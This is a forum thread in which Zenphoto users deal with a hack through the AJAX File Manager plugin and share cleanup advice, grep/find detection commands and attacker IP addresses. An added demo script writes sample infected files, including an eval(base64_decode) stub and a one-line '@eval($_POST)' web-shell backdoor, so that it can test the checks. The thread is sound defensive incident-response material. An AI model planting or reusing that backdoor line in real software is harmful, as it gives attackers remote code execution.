I run 5 galleries within my employer's websites... and we got hacked, too, although just on one, I guess. Firefox alert + strange htaccess.
OK, enough with what happened... the question is how to clean up the mess.
What do you say about deleting everything apart from the albums folder and copying the table which holds the names of the galleries? I have hundreds of galleries and it would be too much for me to add the names again.
Can anyone from Zenphoto tell me the tables to copy? Is the way I want to do it possible at all?
Installing fresh Zenphoto, copying albums, adding only the images + descriptions tables.
You know what, this might in fact be a nice idea for a quick script : ) What do you say, guys?
If your database is not hacked you don't need to do anything. We recommend using the database backup tool on the admin overview page frequently to be prepared.
Follow the upgrade/installation instructions and don't touch the albums folder. Then all should be as before.
So you don't think that much dirt is left after updating + deleting wrong .htaccess files? I don't know, I'm not sure I want to leave it like that... I'd rather have everything cleaned up...
We actually don't know what exactly these hacks did. Neither Zenphoto.org nor any of my sites were affected. It seems at least that there were two different hacks if you read the forum topics.
It is up to you as the site manager to check if there is anything else. If you upgrade normally all core files are replaced; it is up to you as the site manager to check other files like custom themes, the database etc.
All we know is that the 3rd party file manager we included is probably more insecure than the issue we fixed for 1.4.1.5. Thus it should be removed completely.
Or is there something else significant on your mind?
1. The AJAX File Manager has a number of vulnerabilities, through class.images.php and ajaxfilemanager.php, and maybe more.
2. When exploiting these files a hacker is able to insert their own code into the Ajax File Manager data.php and/or write out their own files by dynamically inserting PHP functions into the script, due to the way the AJAX File Manager handles a POST request.
3. Hackers can install a PHP shell script which can access every file on your webserver.
4. Their shell script will add code to the top of every file on your webserver (infect every PHP file on the server) and also possibly infect your .htaccess files as well. There are different variations of the attack that do different things.
5. Their shell script will install a number of other PHP files that they can access directly to regain access to your server even after you delete the Ajax File Manager and clean all of the infected files where code has been added to them.
6. You may notice files such as tmp_989089080.php or other unknown files that you need to delete as well.
7. If you host multiple domains or WordPress installs under a single account, chances are these websites will be infected too.
What to do about it? How to fix it?
1. Delete the zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager directory.
2. Restore all of your website(s) files from a backup because they all have been infected.
If you don't have a backup you will need to delete Zen Photo completely and reinstall (make sure you delete the ajaxfilemanager directory if you reinstall).
3. If you have WordPress or other sites hosted (and no backups) you will need to back up your wp-content folder ... then delete all the WordPress files and reinstall. AND GO THROUGH EACH FILE in wp-content to remove the code inserted at the top of every PHP file before restoring the wp-content folder.
4. You will need to go through each and every folder on your server or hosting account to remove any additional files and shell scripts that were installed by the exploit. Files such as tmp_989809809.php etc ...
5. IMPORTANT: You will need to change the passwords of your databases for any website you host that has been infected. The exploit allows the hacker to view the source code of the config files, so they know what your database passwords are. This would allow them to regain access through phpMyAdmin etc. even if you cleaned everything. You need to change your passwords!!
6. If you have shell access to your server you can run the following commands to see if you have cleaned everything, or to help you clean everything:
7. Part of the attack *might* allow the hacker to gain access to your browser cookie and session info, so in conjunction with the infected files they will be notified when you log in to your Zen Photo admin or other admin tools and might be able to hijack your session to gain access to the admin without knowing your actual password. So clear your cookies and reset your admin passwords. I don't see this happening but it is a possibility.
Run these commands from the top directory on your server or hosting account:
This will show you all the files on your webserver that have been infected and need to be cleaned:
grep -r -H "lb11" .   # search "." rather than "*": "*" skips the top-level .htaccess
(looks for the string 'lb11' in every file; infected files have this inserted into them). You can substitute 'lb11' with other strings that the hacker might have inserted into your code. For example:
grep -r -H "eval(base64_decode" .
Use the find command to show additional files that may have been installed on your server:
find . -name 'tmp*'   # quoted so the shell does not expand the glob before find runs
Use the find command to show files that have been modified in the last day (these would be the files that have been infected or added):
find . -type f -mtime -1
Look in your access log files for suspicious activity and ban those IP addresses:
grep ajaxfilemanager access.log
grep '\.php' access.log
Hope this info helps ...
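The triage steps from the post above, as an added example that is not part of the original thread and not Zenphoto's own code. The script builds a constructed sample site (one clean PHP file, one with an injected stub carrying the 'lb11' marker and an eval(base64_decode(...)) call, a rewritten top-level .htaccess, a dropped tmp_<digits>.php backdoor) plus a constructed Apache access log using documentation IP ranges, then runs the same grep/find checks and pulls the source IPs that requested the ajaxfilemanager path or a backdoor. The file contents, log lines and IPs are made up for the demo; the deny block uses Apache 2.2 Order/Deny syntax (2.4 uses Require not ip). Two pitfalls of the one-liners are handled: the marker search roots at the directory so dotfiles such as .htaccess are included, and the find pattern is quoted so the shell does not expand it first.

```shell
#!/bin/sh
# Added example, not code from the Zenphoto thread: the post's triage steps
# as functions, exercised against a constructed sample site and log.
set -u

DEMO=$(mktemp -d)            # constructed sample site; removed at exit
trap 'rm -rf "$DEMO"' EXIT
mkdir -p "$DEMO/albums" "$DEMO/logs"

# Clean file.
printf '<?php\necho "hello";\n' > "$DEMO/index.php"
# Infected file: stub prepended to line 1 carrying both markers the post
# names, the 'lb11' string and an eval(base64_decode(...)) call.
printf '<?php /*lb11*/ eval(base64_decode("ZWNobyAxOw==")); ?>\n<?php\necho "gallery";\n' > "$DEMO/albums/gallery.php"
# Rewritten top-level .htaccess (a dotfile, which "grep ... *" would skip).
printf 'RewriteEngine On\nRewriteRule ^.*$ http://example.invalid/ [R,L]\n' > "$DEMO/.htaccess"
# Dropped backdoor using the tmp_<digits>.php naming the post mentions.
printf '<?php @eval($_POST["c"]); ?>\n' > "$DEMO/tmp_989089080.php"
# Constructed Apache combined-format log; IPs are documentation ranges.
cat > "$DEMO/logs/access.log" <<'EOF'
203.0.113.10 - - [10/Nov/2011:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2011:10:02:15 +0000] "POST /zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php HTTP/1.1" 200 88 "-" "-"
198.51.100.7 - - [10/Nov/2011:10:02:40 +0000] "POST /zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/data.php HTTP/1.1" 200 88 "-" "-"
192.0.2.44 - - [10/Nov/2011:10:05:00 +0000] "GET /tmp_989089080.php?c=id HTTP/1.1" 200 40 "-" "-"
203.0.113.10 - - [10/Nov/2011:10:06:30 +0000] "GET /albums/gallery.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
EOF

# Files carrying a known injection marker. Searching "$1" (a directory)
# rather than "*" means dotfiles such as .htaccess are included.
injected_files() {
    grep -rlE 'lb11|eval\(base64_decode' "$1" | sort
}

# Dropped files matching tmp_<digits>.php. The pattern is quoted so the
# shell does not expand it against the current directory before find runs.
dropped_files() {
    find "$1" -type f -name 'tmp_[0-9]*.php' | sort
}

# Every .htaccess in the tree, for manual review of rules you never wrote.
htaccess_files() {
    find "$1" -type f -name .htaccess | sort
}

# Files modified within the last day: what the attack touched or added.
recently_modified() {
    find "$1" -type f -mtime -1 | sort
}

# Source IPs that requested the vulnerable plugin path or a dropped backdoor.
attacker_ips() {
    grep -E 'ajaxfilemanager|/tmp_[0-9]+\.php' "$1" | awk '{print $1}' | sort -u
}

# Apache 2.2-style block for .htaccess: deny exactly those IPs, allow the rest.
deny_block() {
    printf 'Order Allow,Deny\nAllow from all\n'
    attacker_ips "$1" | sed 's/^/Deny from /'
}

echo "== files with injection markers =="; injected_files "$DEMO"
echo "== dropped backdoors =="; dropped_files "$DEMO"
echo "== .htaccess files to review =="; htaccess_files "$DEMO"
echo "== modified in the last 24h =="; recently_modified "$DEMO"
echo "== IPs that hit the plugin or a backdoor =="; attacker_ips "$DEMO/logs/access.log"
echo "== deny block for .htaccess =="; deny_block "$DEMO/logs/access.log"
```

To use it on a real account, point the functions at the account's top directory and the real access log instead of the constructed ones, and review every hit by hand before deleting anything: the marker grep finds only the variants you already know about, so the modified-in-the-last-day list and the .htaccess list are the catch-all for the rest.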
Thank you jest3r-, your post has been really helpful! We identified 4 IP addresses that requested the ajaxfilemanager files from our server: 31.133.44.40 81.163.143.194 78.24.220.110 209.44.123.133
My site was also infected, and, my host de-activated my account until all of my dot.htaccess files are removed, WP is re-installed, and my three zenphoto instances are upgraded.
This is really bad. I'm quite disappointed that I installed malicious code from zenphoto.
My site was taken over too, which unfortunately spilled into a second site that I run within the same hosting account. Very important to replace / clean *every* php file on the system, and look at *every* .htaccess file, even any that are outside of the webserver's DocumentRoot.
Filipe - it's disappointing, but you run this risk with any php based software that accepts a user input. Whether you wrote it yourself or got it from places like zenphoto.
However, a more pro-active alert would have been good. I only upgraded to 1.4.1.4 a couple of weeks back, so wasn't checking this site looking for new updates. Each forum member has registered with an email address, how about a bulk email alert?
Regarding more alerts: if you don't visit the site regularly, use the RSS feed, subscribe to our Twitter account (mirrors the RSS) or the Google announcement mailing group (also all translators got it via the translate group).
Additionally there is an included plugin that displays the latest news within your Zenphoto admin overview pages if enabled.
Sorry, if you use free software you also have to be a little self-active. We are a pretty small team (half a day apart due to time zones) and I think we were pretty fast with all this for that.
Btw, the forum has no massmail tool as far as I know.
I don't do Twitter - too much banality. However I found the google mailing list after I posted, so have now subscribed to that. Though it may not catch everyone, which is why I wondered about the mass email... I'd used the feature in phpBB to alert my users.
Hello, my Zenphoto was hacked. I listed some IP addresses: 31.133.44.40 62.109.21.23 78.24.220.110 81.163.143.194 82.146.43.62 92.63.102.50 92.63.105.26 92.63.107.39 209.44.123.133
I agree about Twitter in general... ;-) We will have to look if there is actually a mass mail addon for this forum. But still I think the best is the mailing list or RSS.